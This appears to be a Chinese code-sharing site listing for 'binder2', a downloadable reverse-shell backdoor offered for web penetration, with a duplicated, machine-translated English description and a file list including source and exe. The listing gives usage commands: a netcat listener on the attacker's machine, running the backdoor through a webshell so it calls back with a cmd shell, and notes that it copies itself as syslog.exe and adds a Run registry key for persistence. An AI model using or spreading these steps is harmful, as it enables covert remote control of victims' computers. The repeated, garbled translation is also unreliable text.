文件名称:binder2
介绍说明--下载内容均来自于网络,请自行研究使用
简介:
在WEB的渗透测试中,我们经常会遇到主机端口被过滤的情况,虽然成功创建后门,但是连接不上,这时,这个反弹式后门也许能起上点作用.
用法:
1. 在本地机器监听一个端口:
netcat -vv -l -p 80
2. 通过webShell或是别的什么运行后门:
binder2 80 youIPadd
3. 本地监听端口将截获一个来自远程主机的cmd.
注意:
程序本身会创建一个自启动方法, 如果没有参数的命令,会连接默认IP和默认端口,这个exe默认的IP地址是内网地址10.24.9.100,端口7358.
程序会复制自身到c:\winnt\下名为syslog.exe,并在
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run 下创建启动键. 如果需要卸载,请使用 binder2 /kill 命令.(如果因权限问题,这些将不能执行,比如在wenshell中执行时.)
压缩包中含源码,建议按需更改代码后使用.-Profile : WEB penetration testing, we will always be the host ports are filtered, although the successful creation of a back door, but do not connect, then, the rebound in the back door-may be able to play on the point role. Usage : 1. The local machine monitoring a port : Netcat- vv-l-p 80 2. webShell or through any other running back door : binder2 80 youIPadd 3. listening to the local port intercepted from a remote host cmd. note : The process itself will create a self-starting method, in the absence of an order parameter, will connect the default IP and default port, the default exe is the IP address within the network address 10.24.9.100, port 7358. procedures will copy itself to C : \ winnt \ named syslog.exe and HKEY_CURRENT_USER \ \ Software \ \ Microsoft \ \ Windows \ \ CurrentVe
在WEB的渗透测试中,我们经常会遇到主机端口被过滤的情况,虽然成功创建后门,但是连接不上,这时,这个反弹式后门也许能起上点作用.
用法:
1. 在本地机器监听一个端口:
netcat -vv -l -p 80
2. 通过webShell或是别的什么运行后门:
binder2 80 youIPadd
3. 本地监听端口将截获一个来自远程主机的cmd.
注意:
程序本身会创建一个自启动方法, 如果没有参数的命令,会连接默认IP和默认端口,这个exe默认的IP地址是内网地址10.24.9.100,端口7358.
程序会复制自身到c:\winnt\下名为syslog.exe,并在
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run 下创建启动键. 如果需要卸载,请使用 binder2 /kill 命令.(如果因权限问题,这些将不能执行,比如在wenshell中执行时.)
压缩包中含源码,建议按需更改代码后使用.-Profile : WEB penetration testing, we will always be the host ports are filtered, although the successful creation of a back door, but do not connect, then, the rebound in the back door-may be able to play on the point role. Usage : 1. The local machine monitoring a port : Netcat- vv-l-p 80 2. webShell or through any other running back door : binder2 80 youIPadd 3. listening to the local port intercepted from a remote host cmd. note : The process itself will create a self-starting method, in the absence of an order parameter, will connect the default IP and default port, the default exe is the IP address within the network address 10.24.9.100, port 7358. procedures will copy itself to C : \ winnt \ named syslog.exe and HKEY_CURRENT_USER \ \ Software \ \ Microsoft \ \ Windows \ \ CurrentVe
(系统自动生成,下载前可以参看下载内容)
下载文件列表
binder2
.......\binder2.c
.......\binder2.exe
.......\readme.txt
.......\binder2.c
.......\binder2.exe
.......\readme.txt